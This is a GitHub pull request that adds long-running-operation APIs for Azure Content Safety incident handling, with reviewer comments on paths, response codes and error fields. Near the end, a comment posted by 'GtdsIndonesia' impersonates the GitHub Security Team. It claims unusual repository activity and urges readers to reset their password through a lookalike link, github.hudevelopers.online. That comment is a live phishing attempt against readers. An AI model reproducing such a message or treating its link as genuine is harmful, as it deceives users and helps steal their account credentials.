### PR TITLE
add LRO apis of incident response for 0415

### PR DESCRIPTION
**Pull request by hongbiaogou**
# Choose a PR Template

Switch to "Preview" on this description then select one of the choices below.

<a href="?expand=1&template=data_plane_template.md">Click here</a> to open a PR for a Data Plane API.

<a href="?expand=1&template=control_plane_template.md">Click here</a> to open a PR for a Control Plane (ARM) API.

### CODE REVIEW

File: specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json [hunk 1]
```diff
@@ -332,6 +332,47 @@
...
+            "$ref": "#/parameters/Azure.Core.Foundations.ApiVersionParameter"
+          },
+          {
+            "name": "incidentName",
+            "in": "path",
+            "description": "incident name.",
+            "required": true,
+            "type": "string",
+            "maxLength": 64,
+            "pattern": "^[0-9A-Za-z._~-]+$"
```
Comment (yeeyang19) [inline specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json:351]: please use the right pattern

File: specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json [hunk 2]
```diff
@@ -332,6 +332,47 @@
...
+          }
+        ],
+        "responses": {
+          "200": {
```
Comment (yeeyang19) [inline specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json:355]: response should be 202

File: specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json [hunk 3]
```diff
@@ -332,6 +332,47 @@
...
+            "schema": {
+              "$ref": "#/definitions/ImageIncidentOperationResult"
+            }
+          },
+          "default": {
+            "description": "An unexpected error response.",
+            "schema": {
+              "$ref": "#/definitions/Azure.Core.Foundations.ErrorResponse"
+            },
+            "headers": {
```
Comment (yeeyang19) [inline specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json:366]: add operation location

File: specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json [hunk 4]
```diff
@@ -434,6 +475,55 @@
         }
       }
     },
+    "/image/incidents/{incidentName}/operations/{operationId}": {
```
Comment (yeeyang19) [inline specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json:478]: the path should be /image/incidents/operations/{operationId}

Comment (hongbiaogou) [reply specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json:478]: update

File: specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json (hunk 1 above)
Comment (hongbiaogou) [reply specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json:351]: update

File: specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json (hunk 2 above)
Comment (hongbiaogou) [reply specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json]: update

File: specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json (hunk 3 above)
Comment (hongbiaogou) [reply specification/cognitiveservices/data-plane/ContentSafety/preview/2024-04-15-preview/contentsafety.json:392]: update

File: specification/cognitiveservices/ContentSafety/routes.tsp [hunk 5]
```diff
@@ -389,3 +389,49 @@ interface ImageIncidents {
...
+  extends Azure.Core.ResourceOperations<NoRepeatableRequests &
+      NoConditionalRequests &
+      NoClientRequestId> {}
+
+@added(ContentSafety.Versions.v2024_04_15_Preview)
+interface TextIncidentOperation {
+  @summary("Activate Text Incident Operation")
+  @doc("Active text incident operation.")
+  activate is TextIncidentOperationsOps.LongRunningResourceAction<
+  TextIncident,
```
Comment (mengaims) [inline specification/cognitiveservices/ContentSafety/routes.tsp:403]: Allow the client to pass an Operation-Id header with an ID for the operation's status monitor. And generate an ID (typically a GUID) for the status monitor if the Operation-Id header was not passed by the client.
https://github.com/microsoft/api-guidelines/blob/vNext/azure/Guidelines.md#post-or-delete-lro-pattern

File: specification/cognitiveservices/ContentSafety/models.tsp [hunk 6]
```diff
@@ -724,3 +718,37 @@ model AnalyzeImageDetectIncidentsOptions {
...
+model ImageIncidentOperationResult {
+  @doc("The ID of the image incident operation.")
+  @key("operationId")
+  @visibility("read", "create", "query")
+  @maxLength(64)
+  id: string;
+
+  @doc("The status of the image incident operation.")
+  @visibility("read")
+  status: IncidentOperationStatus;
```
Comment (mengaims) [inline specification/cognitiveservices/ContentSafety/models.tsp:749]: Consider adding an optional error field here to return any error that appears when activating. The default error response of this API is only for this API itself, not for activate.

Comment (mengaims) [reply specification/cognitiveservices/ContentSafety/models.tsp:749]: https://github.com/microsoft/api-guidelines/blob/vNext/azure/Guidelines.md#obtaining-status-and-results-of-long-running-operations

Comment (hongbiaogou) [reply specification/cognitiveservices/ContentSafety/models.tsp:749]: update

File: specification/cognitiveservices/ContentSafety/routes.tsp (hunk 5 above)
Comment (hongbiaogou) [reply specification/cognitiveservices/ContentSafety/routes.tsp:403]: update

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Pull request merged**